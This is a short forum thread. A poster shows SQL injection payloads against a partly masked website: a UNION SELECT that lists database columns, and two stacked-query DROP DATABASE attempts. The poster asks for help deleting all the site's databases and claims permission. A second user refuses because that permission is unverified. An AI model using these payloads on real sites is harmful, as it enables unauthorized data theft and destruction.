SQL Injection Hacking

Discuss the many weaknesses of browser security and ways to mitigate the threat

SQL Injection Hacking

Post by skbly7 on Sat Mar 16, 2013 2:48 pm
([msg=74563]see SQL Injection Hacking[/msg])

Hello,
I am currently working on SQL Injection Vulnerability of websites..


http://xyz(removed).com/events/events.php?event=74'

on opening it I found that it is vulnerable to attacks..
then
http://xyz.com/events/events.php?event=74 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
I found vulnerable number that was 24, and so this url was working and displaying all coloum names, similarly i found all the databases names too...
Now, what i have to do is to delete all the databases from this...
What should i do ?
Need help in this thing...

I have tried this :
http://xyz.com/events/events.php?event=74'; DROP DATABASE *;#
http://xyz.com/events/events.php?event=74'; DROP DATABASE 'testDB';#

(testDB is database on the phpmyadmin)
But it is not working...

NOTE : THE SITE I AM WORKING ON IS OF MY COLLEGE`s SENIOR AND I HAVE TAKEN ALL PERMISSIONS TO DO SO.

Thanks in advance....
skbly7
New User
New User
 
Posts: 1
Joined: Sat Mar 16, 2013 2:41 pm
Blog: View Blog (0)


Re: SQL Injection Hacking

Post by -Ninjex- on Sat Mar 16, 2013 3:45 pm
([msg=74566]see Re: SQL Injection Hacking[/msg])

Malicious activity is not accepted here.

You will not get any help, unless you can prove that it is on ethical terms.

I understand you said it is for your college, but we don't just take people for their word.

IBTL;
Spreading knowledge just once a day, can help keep the script kiddies away ⠠⠵
no_hope if world.map{|person, ic = 0| ic +=1 if ignorance.include?(person)}.compact.length > (world.length / 2)
The absence of evidence is not evidence of absence.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1061
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)



Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests